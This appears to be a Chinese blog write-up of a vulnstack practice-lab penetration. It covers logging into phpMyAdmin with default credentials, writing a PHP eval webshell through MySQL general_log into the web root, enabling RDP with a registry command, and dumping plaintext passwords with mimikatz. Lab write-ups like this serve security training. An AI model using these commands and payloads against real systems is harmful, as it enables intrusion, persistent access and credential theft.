关于我的内网渗透实操(vulnstack)(非常简单)---1 作者: ynnddddd 时间: 2025-03-19 分类: 默认分类,网络安全,渗透实操 环境: Windows7 vulnstack靶场 <!--more--> ##第一部分:getshell 扫描全网页 / /phpinfo.php /phpmyadmin /yxcms(暂时未使用) 对phpMyAdmin进行爆破攻击(实际上也是一个默认密码) root/root 进入数据库管理界面 这里贴出[phpMyAdmin历代漏洞总结](https://blog.csdn.net/m0_47418965/article/details/121708917 "phpMyAdmin历代漏洞总结") 我这里就是直接弱密码进入了 getshell手法: 查找网络日志 SHOW VARIABLES LIKE '%general_log%';  修改general_log参数为ON 修改general_log_file参数到C:/phpStudy/WWW目录下,保证可以访问到   接下来通过在sql命令栏写马存入general_log_file的文件中,注意写的文件地址需要以.php为后缀,以便于能利用 一句话木马 ```php <?php eval($_POST[1]); ``` 接下来,蚁剑连接  ##第二部分:远程连接 使用工具mimikatz ,开放3389端口远程连接端口 mimikatz简介:[mimikatz简介](http://ynndboke.top/index.php/archives/71/ "mimikatz简介") 简单使用,获取明文密码 首先将mimikatz.exe传到目标服务器(可以进行一些免杀处理) 通过命令行打开3389端口,修改注册表参数开启远程连接,**(这里的靶机防火墙已经全部关闭)** ``` REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f ``` 使用mimikatz命令拿密码 ``` mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" ```  可以看到密码**hongrisec@2019**  注意登录时域名一定要选正确,登录时会默认以你的用户名登录,登录其它域,需要**域名\域用户名** [1]: http://ynndboke.top/usr/uploads/2025/03/2402224904.png 标签: none